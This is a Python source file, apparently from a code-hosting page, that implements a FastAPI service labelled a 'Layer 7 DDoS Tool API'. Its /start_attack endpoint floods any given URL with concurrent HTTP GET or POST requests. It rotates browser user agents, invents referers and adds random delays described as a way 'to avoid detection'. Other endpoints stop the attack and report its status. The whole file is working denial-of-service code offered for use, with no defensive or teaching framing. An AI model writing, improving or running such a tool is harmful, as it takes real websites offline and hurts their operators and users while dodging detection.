dstat / main.py
rkihacker's picture
Create main.py
faf62e8 verified
raw
history blame
6.23 kB
import asyncio
import aiohttp
import argparse
from fastapi import FastAPI, HTTPException
from fastapi.middleware.cors import CORSMiddleware
import uvicorn
from typing import Optional
import random
import string
import time
from concurrent.futures import ThreadPoolExecutor
import threading
app = FastAPI()
# CORS configuration
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# Global variables for attack state
attack_active = False
attack_thread = None
attack_config = {}
# User agents for randomization
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
]
def generate_random_string(length=10):
"""Generate a random string of fixed length"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
async def send_request(session, url, method="GET", headers=None, data=None):
"""Send a single HTTP request"""
try:
if method.upper() == "GET":
async with session.get(url, headers=headers) as response:
return response.status
elif method.upper() == "POST":
async with session.post(url, headers=headers, data=data) as response:
return response.status
except Exception as e:
return str(e)
async def attack_worker(url, method, duration, max_threads, headers=None, data=None):
"""Worker function for the attack"""
start_time = time.time()
connector = aiohttp.TCPConnector(limit=max_threads, force_close=True)
timeout = aiohttp.ClientTimeout(total=10)
async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
while time.time() - start_time < duration and attack_active:
try:
# Randomize headers and data if not provided
request_headers = headers or {
"User-Agent": random.choice(USER_AGENTS),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
"Referer": f"https://{generate_random_string(10)}.com/",
}
request_data = data or {
"data": generate_random_string(20),
"timestamp": str(time.time())
}
# Send request
status = await send_request(session, url, method, request_headers, request_data)
# Print status (you might want to log this instead)
print(f"Request sent to {url} - Status: {status}")
# Random delay between requests to avoid detection
await asyncio.sleep(random.uniform(0.1, 0.5))
except Exception as e:
print(f"Error in attack worker: {e}")
await asyncio.sleep(1)
def start_attack(url, method="GET", duration=60, max_threads=100, headers=None, data=None):
"""Start the attack in a separate thread"""
global attack_active, attack_thread, attack_config
if attack_active:
raise ValueError("Attack is already in progress")
attack_active = True
attack_config = {
"url": url,
"method": method,
"duration": duration,
"max_threads": max_threads,
"headers": headers,
"data": data
}
def run_attack():
asyncio.run(attack_worker(url, method, duration, max_threads, headers, data))
global attack_active
attack_active = False
attack_thread = threading.Thread(target=run_attack)
attack_thread.daemon = True
attack_thread.start()
def stop_attack():
"""Stop the current attack"""
global attack_active
attack_active = False
@app.get("/")
async def root():
return {"message": "Layer 7 DDoS Tool API"}
@app.post("/start_attack")
async def start_attack_endpoint(
url: str,
method: str = "GET",
duration: int = 60,
max_threads: int = 100,
headers: Optional[dict] = None,
data: Optional[dict] = None
):
try:
start_attack(url, method, duration, max_threads, headers, data)
return {
"status": "success",
"message": f"Attack started on {url} for {duration} seconds with {max_threads} threads"
}
except Exception as e:
raise HTTPException(status_code=400, detail=str(e))
@app.post("/stop_attack")
async def stop_attack_endpoint():
stop_attack()
return {"status": "success", "message": "Attack stopped"}
@app.get("/status")
async def get_status():
global attack_active, attack_config
return {
"attack_active": attack_active,
"attack_config": attack_config if attack_active else None
}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Layer 7 DDoS Tool")
parser.add_argument("--host", type=str, default="0.0.0.0", help="Host to bind to")
parser.add_argument("--port", type=int, default=8000, help="Port to listen on")
parser.add_argument("--ssl-keyfile", type=str, help="SSL key file for HTTPS")
parser.add_argument("--ssl-certfile", type=str, help="SSL certificate file for HTTPS")
args = parser.parse_args()
ssl_config = None
if args.ssl_keyfile and args.ssl_certfile:
ssl_config = {
"keyfile": args.ssl_keyfile,
"certfile": args.ssl_certfile
}
uvicorn.run(
app,
host=args.host,
port=args.port,
ssl_keyfile=args.ssl_keyfile if ssl_config else None,
ssl_certfile=args.ssl_certfile if ssl_config else None,
log_level="info"
)